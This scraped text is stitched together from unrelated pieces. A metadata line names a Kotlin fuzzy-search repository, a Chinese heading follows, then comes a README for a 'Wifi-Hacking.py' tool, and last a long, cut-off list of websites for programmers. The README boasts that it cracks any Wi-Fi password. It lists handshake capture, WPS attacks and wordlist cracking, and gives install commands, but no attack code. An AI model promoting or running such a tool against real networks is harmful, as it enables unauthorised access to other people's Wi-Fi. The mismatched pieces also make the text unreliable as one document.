20230710T01:16:11Z | Null | https://github.com/solo-studios/kt-fuzzy | 3 | 0| # 日更新程序
[![Python 3.5](https://img.shields.io/badge/Python-3.5-yellow.svg)](http://www.python.org/download/) [![python](https://img.shields.io/badge/python-2.7-brightgreen.svg)](https://www.python.org/downloads/release/python-2714/) [![OS](https://img.shields.io/badge/Tested%20On-Linux%20%7C%20Android-yellowgreen.svg)](https://termux.com/) # Wifi-Hacking.py ![alt tag](http://icons.iconarchive.com/icons/icons8/ios7/48/Network-Wifi-Logo-icon.png) No Need To Ask Wifi Password, HACK it..! This Cyber Security Tool, Will Hack For You Any Wifi-Password..! [![asciicast](https://asciinema.org/a/362908.svg)](https://asciinema.org/a/362908) ## Feutures and Contains : ```bash 1)Start monitor mode 2)Stop monitor mode 3)Scan Networks 4)Getting Handshake 5)Create wordlist 6)Install Wireless tools 7)WPS Networks attacks 8)Scan for WPS Networks 9)Crack Handshake with rockyou.txt 10)Crack Handshake with wordlist 11)Crack Handshake without wordlist ``` ## Tested On : * Kali Linux * BlackArch Linux * Ubuntu * Kali Nethunter * Termux ( Rooted Devices) * Parrot OS # Installation ### Kali Linux / Ubuntu / Parrot OS ```bash 1) sudo apt-get update && apt-get install git 2) sudo git clone https://github.com/ankit0183/Wifi-Hacking 3) cd Wifi-Hacking/ 4) sudo python3 Wifi-Hacking.py ``` ## Creator (Ankit Kanojiya) Hey, Dont Forget To say Thanks me :smile: # SCREENSHOT ![](Snapshots/0.png) ![](Snapshots/1.png) ![](Snapshots/2.png) ![](Snapshots/3.png) ![](Snapshots/4.png) ![](Snapshots/5.png) ![](Snapshots/6.png) ![](Snapshots/7.png) # Feel Free To Contact Me. ### if you like my work, Buy me a Cup of Coffee PhonePay/PayTm/GPAy 9768367597 ### - [Whats App chat](https://wa.me/+919768367597) ### - [Instagram](https://www.instagram.com/ankit_kanojiiya/) # Disclaimer Wifi-Hacking tool not responsible for misuse and for illegal purposes. Use it only for Pentest or Educational purpose :smile: !!! > Pull requests are always welcome.. :) ###### Donation If this CyberSecurity tool has been useful for you, feel free to thank me by buying me a coffee. :) ### Happy Hacking ( Privacy & Security No Such Things Exists in digital World, We Can Hack Everything )
<h1 align="center"> <br> <img width="200" src="https://raw.githubusercontent.com/sindresorhus/awesome/main/media/logo.svg" alt="awesome"> <br> </h1> [![Build Status](https://api.travis-ci.org/sdmg15/Best-websites-a-programmer-should-visit.svg?branch=master)](https://travis-ci.org/sdmg15/Best-websites-a-programmer-should-visit) # Best-websites-a-programmer-should-visit Some useful websites for programmers. When learning CS, there are some useful sites you must know to get always informed to do your technologies even better and learn new things. Here is a non-exhaustive list of some sites you should visit. This list will get updated as soon as I can get another link, but you can also contribute by adding those you know :wink: **Note** : [Chinese Version](https://github.com/tuteng/Best-websites-a-programmer-should-visit-zh) ## Index <ul> <li><a href="#when-you-get-stuck">When you get stuck</a></li> <li><a href="#news">News</a></li> <li><a href="#magazines">Magazines</a></li> <li><a href="#coding-practice-for-beginners">Coding practice for beginners</a></li> <li><a href="#cryptocurrency">Cryptocurrency</a></li> <li><a href="#for-those-who-want-to-start-a-small-project-but-cant-find-the-ideas">For those who want to start a small project but can't find the ideas</a></li> <li><a href="#general-coding-advice">General Coding advice</a></li> <li><a href="#coding-style">Coding Style</a></li> <li><a href="#general-tools">General Tools</a></li> <li><a href="#interview-preparation">Interview Preparation</a></li> <li><a href="#documentaries">Documentaries</a></li> <li><a href="#moocs-for-learning-something-new">MOOCs for learning something new</a></li> <li><a href="#sites-related-to-your-preferred-programming-language-for-me-c">Sites related to your preferred programming language (For me C++)</a></li> <li><a href="#learn-ai">Learn AI</a></li> <li><a href="#seminar-research-writing-talks-etc">Seminar , research writing , talks etc</a></li> <li><a href="#everything-in-one-place">Everything in one place</a></li> <li><a href="#youtube-channels">YouTube Channels</a></li> <li><a href="#good-articles">Good Articles</a></li> <li><a href="#bash-and-shell-scripting">Bash and Shell scripting</a></li> <li><a href="#podcasts">Podcasts</a></li> <li><a href="#building-a-simple-compilerinterpreter">Building a Simple Compiler/Interpreter</a></li> <li><a href="#watch-others-code">Watch others code</a></li> <li><a href="#tutorials">Tutorials</a></li> <li><a href="#what-should-a-programmer-know">What should a programmer know</a></li> <li><a href="#competitive-programming">Competitive programming</a></li> <li><a href="#computer-books">Computer Books</a></li> <li><a href="#video-tutorials">Video Tutorials</a></li> <li><a href="#online-compiler-and-sharing-code-snippets">Online Compiler and Sharing Code snippets</a></li> <li><a href="#blogs-of-developers">Blogs of Developers</a></li> <li><a href="#for-improving-your-english">For improving your English</a></li> <li><a href="#when-you-get-bored-from-cs-related-stuff">When you get bored from CS related stuff</a></li> <li><a href="#open-source-websites">Open Source Websites</a></li> <li><a href="#internships">Internships</a></li> <li><a href="#jobs">Jobs</a></li> </ul> ## When you get stuck - [Codementor](https://www.codementor.io) : A mentorship community to learn from fellow developers via live 1:1 help and more. - [devRant](https://www.devrant.io) : Community where you can rant and release your stress - [Google](https://www.google.com) : A search engine for anything you get stuck with. - [Learn Anything](https://learn-anything.xyz) : Community curated knowledge graph of best paths for learning anything - [Quora](https://www.quora.com) : A place to share knowledge and better understand the world - [Stack Overflow](https://stackoverflow.com) : subscribe to their weekly newsletter and any other topic which you find interesting - [Stack Exchange](https://stackexchange.com/) : Stack Exchange is the combination of Stack Overflow and 170+ sites where you can get any kinds of help - [Coderanch](https://coderanch.com/) : A friendly place for programming greenhorns. Jump straight into any of our topics and light hearted discussions. Ranging from Java, Databases, Android, Programmer certification, Programming jobs and much more... <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## News - [ACM TechNews](http://technews.acm.org) : TechNews - [Stratechery](https://stratechery.com) : Stratechery by Ben Thompson - [AlternativeTo](https://alternativeto.net) : Crowdsourced software recommendations - [Ars Technica](https://arstechnica.com) : posts unique quality articles - [Better Dev Links](https://betterdev.link) : Weekly links to help you become a better developer - [Better Programming](https://medium.com/better-programming) : Featured articles for modern developers available every day - [CNET](https://www.cnet.com/news/) : Your guide to a better future! An excellent source of up-to-date tech news. - [Daily.Dev](https://daily.dev/) : A Great Chrome extension which provides recent and relevant tech articles and news - [DevOpsLinks](http://devopslinks.com) : An online community of thousands of developers and IT experts interested in DevOps - [Frontend Focus Newsletter](https://frontendfoc.us) : once-weekly roundup of the frontend news, articles and tutorials - [GSMArena.com](http://www.gsmarena.com) : news related to the latest mobile phones and android. - [Hacker News Digest](https://hndigest.com) : curated automatically, delivered as frequently as you want - [Hacker News](https://news.ycombinator.com) : news aggregator for programmers where civility is king, try a newsletter to get top news to your inbox: - [Hacker Newsletter](http://www.hackernewsletter.com) : curated by hand, delivered weekly - [Hacker Noon](https://hackernoon.com) : How hackers start their afternoons. - [High Scalability](http://highscalability.com) : Success stories of various companies on their apps, infra scaling. - [Lobsters](https://lobste.rs) : Lobsters is a technology-focused community centered around link aggregation and discussion. - [product hunt](https://www.producthunt.com) : Discover your next favorite thing - [Recode](https://www.recode.net) : Tech news that focuses on the business of Silicon Valley - [Reddit.com/r/programming](https://www.reddit.com/r/programming/) : Subreddit with aggregated tech news and articles - [Slashdot](https://slashdot.org) : News, Social news (Originally "News for Nerds. Stuff that Matters") - [StackShare](https://stackshare.io) : See what tools are popular with developers and companies and read about their technology decisions - [TechCrunch](https://techcrunch.com) : dedicated to obsessively profiling startups, reviewing new Internet products, and breaking tech news - [The DEV Community](https://dev.to) : Where programmers share ideas and help each other grow. - [The Verge](https://www.theverge.com) : More product oriented tech news - [WCCF Tech](https://wccftech.com) : curated news related to Computer Hardware, Software, and everything else in the Tech World. - [XDA](https://www.xda-developers.com) : Android Developers News - [Hashnode](https://hashnode.com/) : Hashnode is a friendly and inclusive community for software developers - [Rekt](https://rekt.news/) : A journalism related to Defi, Web3, Blockchain and security on them. - [Hackaday](https://hackaday.com) : Hacking is an art form that uses something in a way in which it was not originally intended. <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## Magazines - [MIT Technology Review](https://www.technologyreview.com/magazine/) : MIT's tech review magazine. - [Nautilus](http://nautil.us) : NewYorker for tech. - [LWN](https://lwn.net) : Weekly news coverage of opensource technologies, programming, etc. ( Originally Linux Weekly News). <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## Coding practice for beginners - [freeCodeCamp](https://www.freecodecamp.com) : Learn to code and build projects for nonprofits. Build your full stack web development portfolio today - [Blackbird School](https://blackbird.school) : Learn to code online with our beginner-friendly platform. - [Glitch](https://glitch.com/) : Great place to play around with code in an easy-to-set-up environment. - [Reddit.com/r/dailyprogrammer](https://www.reddit.com/r/dailyprogrammer/) : interesting programming challenges where you can learn from looking at other's code, even if you are not able to solve code you can look at how others solved. - [Programming by Doing](http://programmingbydoing.com) : very good site for those who want to start with absolute basics - [CodeAbbey - a place where everyone can master programming](http://www.codeabbey.com) : Best place to begin with problems that start at the easiest and gradually increase difficulty with each problem. - [Exercism.io](http://exercism.io) : download and solve practice problems in over 50 different languages, and share your solution with others. - [InterviewBit/Coding Interview Questions](https://www.interviewbit.com) : Gamifies the experience of practicing for your interview and includes lots of sample problems to solve. - [karan/Projects-Solutions](https://github.com/karan/Projects-Solutions) : Solutions to most of the problems in the link above - [Lod - Cloud](http://lod-cloud.net) : The Linking Open Data cloud diagram - [Cave of programming](https://caveofprogramming.com) : Learn to program, Upgrade your skills. - [Vim adventures](https://vim-adventures.com/) : Learn VIM by playing - [Learn Vimscript the Hard Way](http://learnvimscriptthehardway.stevelosh.com) : Learn Vim Script from begining to expert. - [Programming Tasks](http://rosettacode.org/wiki/Category:Programming_Tasks) : large collection of small programs - [Pramp](https://www.pramp.com) : It's your turn to be the interviewer. when done, click on the swap roles button on the left - [Paqmind](http://paqmind.com) : Guides and challenges to learn programming - [Codecademy](https://www.codecademy.com) : Learn to code interactively, for free. - [Codegym](https://codegym.cc/) : It contains a Java tutorial with 1200 Java practise tasks. - [treehouse](https://teamtreehouse.com) : The fast, easy, and affordable way to build your skills. - [GeeksforGeeks](https://practice.geeksforgeeks.org) : Learn to code, Study for placement, Do competitive coding. - [edabit](https://edabit.com/challenges) : Practice coding via various small challenges. - [Learn Git Branching](https://learngitbranching.js.org) : Learn and practice git commands in an interactive way - [Oh Shit, Git!?!](https://ohshitgit.com/) : Cheat sheet to get yourself out of bad git situations - [The Odin Project](https://www.theodinproject.com/home) : The Odin Project provides a free open source coding curriculum that can be taken entirely online. - [Udemy](https://www.udemy.com/) : Whether you want to learn or to share what you know, you’ve come to the right place. As a global destination for online learning, we connect people through knowledge. - [Scaler](https://www.scaler.com/topics/) : A curated interactive space for aspiring programmers to learn and master their coding skills. Also help in job interview. - [SQL Zoo](https://sqlzoo.net/wiki/SQL_Tutorial) : Learn SQL interactively in stages, from basic queries to complex operations. <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## CryptoCurrency - [Blockchain Basics](https://www.sitepen.com/blog/2017/09/21/blockchain-basics/) : Great introduction to blockchain - [Blockchain demo](https://blockchaindemo.io/) : A visual demo of Blockchain technology - [Build a blockchain in Python](https://hackernoon.com/learn-blockchains-by-building-one-117428612f46) : Learn Blockchains by Building One - [Coin demo](https://coindemo.io/) : CryptoCurrency demo - [GitCoin](https://gitcoin.co) : Gitcoin is the easiest way to monetize or incentivize work in Open Source Software. - [Learn About Bitcoin and Lightning Protocol](https://chaincode.gitbook.io/seminars/): Complete 4 weeks seminar ciricullum for learning about Bitcoin. - [Learn Me A Bitcoin](https://learnmeabitcoin.com/): Bitcoin, Cryptocurrencies and Blockchain explained in plain English - [Learn Web3 DAO](https://learnweb3.io/): Learn to become a Web3 Developer for free. - [Lite Paper](https://litepaper.com/) : Cryptocurrencies & Blockchain made effortless - [Lopp Bitcoin Resources](https://lopp.net/bitcoin.html) : Some Bitcoin Resources - [Mastering Bitcoin](https://www.oreilly.com/library/view/mastering-bitcoin/9781491902639/): Introduction to Bitcoin and tutorials to operate a full node - [Mempool](https://mempool.space): Bitcoin block explorer, mempool visualizer, transaction tracker, and fee estimator <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## For those who want to start a small project but can't find the ideas - [freeCodeCamp/React project ideas](https://medium.freecodecamp.org/every-time-you-build-a-to-do-list-app-a-puppy-dies-505b54637a5d?gi=c786640fbd11) : 27 fun app ideas you can build while learning React. - [martyr2s-mega-project-ideas-list](http://www.dreamincode.net/forums/topic/78802-martyr2s-mega-project-ideas-list/) : contains about 125 project ideas from beginner to intermediate level. - [karan/Projects](https://github.com/karan/Projects) : a large collection of small projects for beginners with - [Wrong "big projects" for beginners](http://rodiongork.tumblr.com/post/108155476418/wrong-big-projects-for-beginners) : How to choose where to start - [vicky002/1000-Projects](https://github.com/vicky002/1000_Projects) : Mega List of practical projects that one can solve in any programming language! - [reddit.com/r/AppIdeas](https://www.reddit.com/r/AppIdeas/) : A place to discuss ideas for applications, for bored developers. - [reddit.com/r/SomebodyMakeThis](https://www.reddit.com/r/SomebodyMakeThis/) : A home for ideas by people who lack time, money, or skills. - [florinpop17/app-ideas](https://github.com/florinpop17/app-ideas) : A Collection of application ideas which can be used to improve your coding skills. <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## General Coding advice - [How to Begin With Competitive Programming](https://www.geeksforgeeks.org/how-to-begin-with-competitive-programming/) - [10-ways-to-be-a-better-developer](https://stephenhaunts.files.wordpress.com/2014/04/10-ways-to-be-a-better-developer.png) : Ways to become a better dev! - [Code Review Best Practices](https://www.kevinlondon.com/2015/05/05/code-review-best-practices.html) : Kevin London's blog - [Design Patterns](https://sourcemaking.com/design_patterns) : Design Patterns explained in detail with examples. - [Game Programming Patterns](http://gameprogrammingpatterns.com/) : Game Programming Patterns is a collection of patterns Robert Nystrom found in games that make code cleaner, easier to understand, and faster - [How to become a programmer or the art of Googling well](https://okepi.wordpress.com/2014/08/21/how-to-become-a-programmer-or-the-art-of-googling-well/) : How to become a programmer or the art of Googling well - [How to escape tutorial purgatory as a new developer — or at any time in your career](https://medium.freecodecamp.org/how-to-escape-tutorial-purgatory-as-a-new-developer-or-at-any-time-in-your-career-e3a4b2384a40) : How to escape tutorial purgatory - [JS Project Guidelines](https://github.com/wearehive/project-guidelines) : A set of best practices for JavaScript projects. - [Learn to Code With Me](https://learntocodewith.me) : A comprehensive site resource by Laurence Bradford for developers who aims to build a career in the tech world - [Lessons From A Lifetime Of Being A Programmer](http://thecodist.com/article/lessons_from_a_lifetime_of_being_a_programmer) : The Codist Header Lessons From A Lifetime Of Being A Programmer - [MITRE - Top 25 Most Dangerous Software Weaknesses (2022)](https://cwe.mitre.org/top25/archive/2022/2022_cwe_top25.html) : The currently most common and impactful software weaknesses. - [Software Architecture Guide](https://martinfowler.com/architecture/) : A site by Martin Fowler about Software Architecture patterns and best practices to help building software effectively. - [Software design pattern](https://en.wikipedia.org/wiki/Software_design_pattern) : The entire collection of Design Patterns. - [Things I Wish Someone Had Told Me When I Was Learning How to Code — Free Code Camp](https://medium.freecodecamp.com/things-i-wish-someone-had-told-me-when-i-was-learning-how-to-code-565fc9dcb329?gi=fc6d0a309be ) : What I’ve learned from teaching others - [TeachYourselfCS](https://teachyourselfcs.com/) : If you’re a self-taught engineer or bootcamp grad, you owe it to yourself to learn computer science. Thankfully, you can give yourself a world-class CS education without investing years and a small fortune in a degree program - [What every computer science major should know](http://matt.might.net/articles/what-cs-majors-should-know/) : The Principles of Good Programming - [Working as a Software Developer](https://henrikwarne.com/2012/12/12/working-as-a-software-developer/) : Henrik Warne's blog - [The Open Web Application Security Project (OWASP)](https://www.owasp.org) : OWASP is an open community dedicated to enabling organizations to conceive, develop, acquire, operate, and maintain applications that can be trusted. <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## Coding Style - [Airbnb JS Style Guide](https://github.com/airbnb/javascript) : A mostly reasonable approach to JavaScript - [Airbnb Ruby Style Guide](https://github.com/airbnb/ruby) : A Ruby style guide by Airbnb - [Ruby coding style guide](https://github.com/bbatsov/ruby-style-guide) : A community-driven Ruby coding style guide - [Angular 1 Style Guide](https://github.com/johnpapa/angular-styleguide/tree/master/a1) : Officially endorsed style guide by John Pappa - [CS 106B Coding Style Guide](http://stanford.edu/class/archive/cs/cs106b/cs106b.1158/styleguide.shtml) : must see for those who create spaghetti - [Debugging Faqs](http://www.umich.edu/~eecs381/generalFAQ/Debugging.html) : Check out how to debug your program - [Directory of CS Courses (many with online lectures)](https://github.com/prakhar1989/awesome-courses) : Another online CS courses - [Directory of Online CS Courses](https://github.com/ossu/computer-science) : Free online CS courses - [Good C programming habits. • /r/C_Programming](https://www.reddit.com/r/C_Programming/comments/1vuubw/good_c_programming_habits/) : C programming habits to adopt - [Google C++ Style Guide](https://google.github.io/styleguide/cppguide.html) - [How to Report Bugs Effectively](https://www.chiark.greenend.org.uk/~sgtatham/bugs.html) : Want to report a bug but you don't know how? Check out this post - [What are some bad coding habits you would recommend a beginner avoid getting into?](https://www.reddit.com/r/learnprogramming/comments/1i4ds4/what_are_some_bad_coding_habits_you_would/) : Bad habits to avoid when you get started - [PEP8 - Style Guide for Python Code](https://www.python.org/dev/peps/pep-0008/) : Style Guide for Python Code - [Standard JS Style Guide](https://standardjs.com) : JavaScript style guide, with linter & automatic code fixer - [The Hitchhiker's Guide to Python](https://docs.python-guide.org/writing/style/) : Best Practices for Python Development - [Google Python Style Guide](https://google.github.io/styleguide/pyguide.html) : Google Python Style Guide - [Aurelia Style Guide](https://github.com/behzad888/Aurelia-styleguide) : An Aurelia style guide by Behzad Abbasi(Behzad888) - [Source Making ](https://sourcemaking.com/): Design Patterns & Refactoring - [Refactoring Guru](https://refactoring.guru/): Refactoring And Design Patterns - [Google Java Style Guide](https://google.github.io/styleguide/javaguide.html): Google Java Style Guide - [Rust Coding style](https://github.com/rust-dev-tools/fmt-rfcs): Rust code formatting RFCs and coding style guides - [Google C# Style Guide](https://google.github.io/styleguide/csharp-style.html): Google C# Style Guide <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## General Tools - [CoderPad](https://coderpad.io) : Quickly Conduct Coding Interviews and Phone Screen Interviews. - [CodePen](https://codepen.io) : Front End Developer Playground & Code Editor in the Browser - [Crontab Guru](https://crontab.guru/) : Quick and simple editor for cron schedule expressions - [Devicons](http://vorillaz.github.io/devicons/#/main) : Cheatsheet for devs icons - [Diagrams.net](https://app.diagrams.net/) : Drawing tools to make design and uml easily. Old draw.io - [FreeFor.Dev](https://free-for.dev/#/) : A huge list of free resources and tools - [Kody Tools](https://www.kodytools.com/dev-tools): 100+ dev tools including code converters, formatters, and minifiers. - [regex101](https://regex101.com) : Online regex tester and debugger: PHP, PCRE, Python, Golang and JavaScript - [regexr](https://regexr.com) : Another online tool to learn, build & test Regular Expressions - [Wit AI](https://wit.ai) : Natural Language for Developers - [SaaS Design](https://www.saasdesign.io/free-figma-templates) : Collection of open source Figma UI design templates for your next project. - [Seymour](https://harc.github.io/seymour-live2017) : Live Programming for the Classroom - [Code share](https://codeshare.io) : Share code in real-time with other developers - [Solid Tools for Developers](https://soliddevtools.com) : Online debugging tools for developers and system administrators - [OS Query](https://osquery.io) : Easily ask questions about your Linux, Windows, and macOS infrastructure - [LaunchPad](https://launchpad.graphql.com) : Appollo launchepad for testing GraphQl queries - [GraphOnline](https://graphonline.ru/en/) : Useful tool for visualizing Graphs - [Data Structure Visualization](https://www.cs.usfca.edu/~galles/visualization/Algorithms.html) : Perfect website for visually learning Algorithms - [IDE Onlang](https://ide.onelang.io) : Write in one language and get the same result in other languages. - [Pad.new](https://pad.new) : Free cloud-based IDE to run code and databases in almost any language - [PullRequest](https://www.pullrequest.com/) : Code review as a service from vetted, professional reviewers - [Python Visualizer](http://pythontutor.com/visualize.html) : Watch the execution of basic Python, Java, C++, etc. code step-by-step. Recommended for new programmers and the Canadian Computing Competition. - [Extends Class](https://extendsclass.com/) : Online developer tools: REST and SOAP clients, SQLite browser, testers (Regex, XPath, JSONPath) and other tools (Encoders, Converters and formatters) - [Sourcegraph](https://sourcegraph.com/search) : Online tool for searching millions of open source repositories. - [SVG Path Editor](https://yqnn.github.io/svg-path-editor/) : Online and open source SVG Path editor. - [EmailDrop](https://www.emaildrop.io/): Emaildrop is a free disposable email provider. - [Replit.com](https://replit.com): Free, collaborative, in-browser IDE to code in 50+ languages. - [Svgator](https://www.svgator.com/): Animate svg graphically. Its like a video editor but for svg. - [Webhook.site](https://webhook.site/): Useful tool for test and debug webhooks. - [kandi](https://kandi.openweaver.com/): Jumpstart Application Development by finding the right Open Source resource - [Svix Play](https://play.svix.com/): Webhook tester & debugger. Test webhooks directly from your test suite. <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## Bash and Shell scripting - [Advanced Bash-Scripting Guide](http://tldp.org/LDP/abs/html/) : An in-depth exploration of the art of shell scripting - [Bash Guide for Beginners](http://www.tldp.org/LDP/Bash-Beginners-Guide/html/) : Bash Guide for Beginners Machtelt Garrels - [Bash Programming](http://tldp.org/HOWTO/Bash-Prog-Intro-HOWTO.html) : by Mike G mikkey at dynamo.com.ar - [Bash Reference Manual](https://www.gnu.org/software/bash/manual/bashref.html) : Bash Reference Manual - [BashGuide](http://mywiki.wooledge.org/BashGuide) : BashGuide - Greg's Wiki - [Conquering the Command Line](http://conqueringthecommandline.com/book/frontmatter) : Unix and Linux Commands for Developers - [Airborn OS](https://www.airbornos.com) : Private Google Docs Alternative - [Commandlinefu](https://www.commandlinefu.com/commands/browse) : An extensive collection of Shell oneliners that can save your day on many occasions - [Pure Bash Bible](https://github.com/dylanaraps/pure-bash-bible) : A collection of pure bash alternatives to external processes. <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## Interview Preparation - [10 Frequently asked SQL Query Interview Questions](http://www.java67.com/2013/04/10-frequently-asked-sql-query-interview-questions-answers-database.html) - [A Collection of Quant Riddles With Answers](http://puzzles.nigelcoldwell.co.uk) - [A Developer's Guide to Working with Recruiters](https://andreidobrinski.com/blog/a-developers-guide-to-working-with-recruiters/) - [Algorithm design canvas](https://www.hiredintech.com/algorithm-design) - [Aptitude Questions and Answers](http://www.indiabix.com) : Quant and aptitude preparation - [A site for technical interview questions, brain teasers, puzzles, quizzles](https://www.techinterview.org) : whatever the heck those are) and other things that make you think! - [Big collection of interview preparation links • /r/cscareerquestions](https://www.reddit.com/r/cscareerquestions/comments/2lzc4h/big_collection_of_interview_preparation_links/) - [Big-O Algorithm Complexity Cheat Sheet](http://bigocheatsheet.com/#) - [BIG O Misconceptions](http://ssp.impulsetrain.com/big-o.html) - [Bitwise tricks](https://gist.github.com/dideler/2365607) - [ChiperSoft/InterviewThis](https://github.com/Twipped/InterviewThis) : questions to ask during on a interview to know more about the company. - [Code Project](https://www.codeproject.com) : For those who code! - [Core Java Interview questions - Interview question on each topic](http://javahonk.com/core-java-interview-questions/) - [C PUZZLES, Some interesting C problems](http://www.gowrikumar.com/c/index.php) - [CS9: Problem-Solving for the CS Technical Interview](http://web.stanford.edu/class/cs9/) - [Delightful Puzzles](http://gurmeet.net/puzzles/) - [Determining the big-O runtimes of these different loops?](https://stackoverflow.com/questions/11094330/determining-the-big-o-runtimes-of-these-different-loops) : really good stackoverflow question that covers basics of calculating runtime complexity. - [five-essential-phone-screen-questions - steveyegge2](https://sites.google.com/site/steveyegge2/five-essential-phone-screen-questions) - [Freshers Interviews](http://placementsindia.blogspot.com) - [Gainlo](http://www.gainlo.co/#!/) : Mock interview from professionals - [GeeksforGeeks/A computer science portal for geeks](http://www.geeksforgeeks.org) : also subscribe to their feeds to get links to their new articles. - [github.com/odino/interviews](https://github.com/odino/interviews) : list of important questions for interview - [Give your résumé a face lift](http://www.lifeclever.com/give-your-resume-a-face-lift/) - [Google Interview Warmup](https://grow.google/certificates/interview-warmup/) : Google Interview Warmup is an AI-based tool that helps individuals practise for their interviews. - [Here's How to Prepare for Tech Interviews • /r/cscareerquestions](https://www.reddit.com/r/cscareerquestions/comments/1jov24/heres_how_to_prepare_for_tech_interviews/) - [How to Answer "Tell Me a Little About Yourself"/The Art of Manliness](http://www.artofmanliness.com/2016/01/05/tell-me-a-little-about-yourself/) - [How to Answer the Toughest 40 Job Interview Questions/ICS Job Portal](http://www.icsjobportal.com/blog/job-interview-questions) - [How to Break Into the Tech Industry - a Guide to Job Hunting and Tech Interviews](http://haseebq.com/how-to-break-into-tech-job-hunting-and-interviews) - [How to interview](http://kelukelu.me/interview/index.html) - [How to prepare for an interview - 1](http://se7so.blogspot.com/2014/01/how-to-prepare-for-interview-1.html) - [IIT Delhi Placement Experience](http://placement-iit2013.blogspot.com) - [samwincott/Internship-Guide](https://github.com/samwincott/Internship-Guide) : An aggregate of links related to internships. - [Interviewing At Jane Street](https://blog.janestreet.com/interviewing-at-jane-street/) : Interviewing At Jane Street - [Interview Archives - Java Honk](http://javahonk.com/category/interview/) - [Interview Cake](https://www.interviewcake.com/) : Free and Paid course options offering high quality technical interview practice. - [Job Interview: How to Ace a Job Interview/The Art of Manliness](http://www.artofmanliness.com/2012/08/06/how-to-ace-a-job-interview/) - [Job interviews News, Videos, Reviews and Gossip - Lifehacker](https://lifehacker.com/tag/job-interviews) - [Job Interview Questions and Best Answers](https://www.thebalance.com/job-interview-questions-and-answers-2061204) - [kimberli/interviews](https://github.com/kimberli/interviews) : study sheet for Interview - [LeetCode](https://leetcode.com/) : A new way to learn.here you can prepare for your interview. - [Learnersbucket](https://learnersbucket.com): Data Structures and Algorithms in Javascript. - [Mission-peace/interview problems](https://github.com/mission-peace/interview/wiki) : A large collection of coding interview problems - [NeetCode](https://neetcode.io): Prepare topic wise coding questions which are most frequently asked in MAANG companies. - [Pramp/A free on demand interview practice platform for Software Engineers](https://www.pramp.com/ref/gt1) : Practice coding interviews with real peers - [Problems/LeetCode OJ](https://leetcode.com/problemset/algorithms/) : Coding practice for interviews - [Programmer And Software Interview Questions Answers](http://www.programmerinterview.com) - [Reddit.com/user/ashish2199/m/puzzles](https://www.reddit.com/user/ashish2199/m/puzzles/) : Logic Puzzles - [SQL interview questions](https://www.jitbit.com/news/181-jitbits-sql-interview-questions/) : great SQL test - [SQL Joins explained using venn diagram](http://stevestedman.com/wp-content/uploads/VennDiagram1.pdf) - [svozniuk/java-interviews](https://github.com/svozniuk/java-interviews) : Java interview questions - [Techie Delight](https://www.techiedelight.com) : Leading platform for technical interview preparation. - [The 25 most difficult HR questions](http://www.datsi.fi.upm.es/~frosal/docs/25mdq.html) - [Top 10 Algorithms for Coding Interview](https://www.programcreek.com/2012/11/top-10-algorithms-for-coding-interview/) : Algorithms for Coding Interview - [Unix / Linux Cheat Sheet](http://cheatsheetworld.com/programming/unix-linux-cheat-sheet/) - [Unsolicited_advice_for_job_seekers_and_employers](https://www.reddit.com/r/india/comments/1clgdj/unsolicited_advice_for_job_seekers_and_employers/) - [Visualising Data Structures and Algorithms through Animation](https://visualgo.net/en) - [We Help Coders Get Hired](https://www.hiredintech.com/app) : website offering courses on system design, interview strategies, soft skills etc - [what_are_your_goto_questions_for_the_do_you_have?](https://www.reddit.com/r/cscareerquestions/comments/209rkq/what_are_your_goto_questions_for_the_do_you_have/) - [Why You Make Less Money • /r/cscareerquestions](https://www.reddit.com/r/cscareerquestions/comments/1b8wa3/why_you_make_less_money/) - [wu :: riddles(hard)](https://www.ocf.berkeley.edu/~wwu/riddles/hard.shtml) : logic puzzles and riddles - [What I Learned from Interviewing at multiple AI Companies and Start-Ups](https://blog.usejournal.com/what-i-learned-from-interviewing-at-multiple-ai-companies-and-start-ups-a9620415e4cc#fa32) -[Tech Interview Handbook](https://techinterviewhandbook.org/introduction/): Guide on cracking tech interviews <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## Documentaries - [Breaking the Code](https://ia801908.us.archive.org/27/items/youtube-S23yie-779k/) : Biography of Alan Turing - [Cracking The Code Interview](https://www.youtube.com/watch?v=4NIb9l3imAo) : Cracking the Code Interview - [Cracking the Coding Interview](https://www.youtube.com/watch?v=Eg5-tdAwclo) : Cracking the Coding Interview, Fullstack Speaker Series - [Harvard CS50 - Asymptotic Notation (video)](https://www.youtube.com/watch?v=iOq5kSKqeR4) : Asymptotic Notation explained by Harvard - [Machine Code Instructions (video)](https://www.youtube.com/watch?v=Mv2XQgpbTNE) : Code instructions - Machine that Changed the World - a very good documentary about the history of computers - Part 1 is unavailable for free streaming due to widespread copyright claims. - [Part 2: Inventing the Future](https://www.youtube.com/watch?v=0iPiYxjsYKk) - [Part 3: The Paperback Computer](https://www.youtube.com/watch?v=d7DKVfOXr54) - [Part 4: The Thinking Machine](https://www.youtube.com/watch?v=enWWlx7-t0k) - [Part 5: The World at Your Fingertips](https://www.youtube.com/watch?v=fLLXiP7diEo) - [Mechanical Computer (All Parts)](https://www.youtube.com/watch?v=s1i-dnAH9Y4) : a very good video from the 1950s explaining how mechanical computers used to work without all the modern-day electronics. - [Teach Yourself Computer Science](https://teachyourselfcs.com) : Teach Yourself Computer Science - [The Code](https://www.youtube.com/watch?v=XMm0HsmOTFI) : Story of Linux documentary - [The Internet's Own Boy](https://www.youtube.com/watch?v=9vz06QO3UkQ) : The Story of Aaron Swartz <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## MOOCs for learning something new - [Class Central](https://www.class-central.com) : a directory of 100,000+ student reviews of thousands of MOOCs. - [Classpert](https://classpert.com) : a website that gathers MOOCs and online courses from several providers, focusing on computer science and data science courses. - [Computer Science Resources](https://docs.google.com/spreadsheets/d/1BD8BJJUNaX63m2QmySWMGDp71nx4W4MyyiIBlfMoN3Q/htmlview?sle=true#) : list of MOOCs for autodidacts - [Coursera.org](https://www.coursera.org) : Take the world's best courses, online. - [CS50](https://www.youtube.com/user/cs50tv/videos) : A set of goods tutorials from cs50 - [edX](https://www.edx.org) : Free 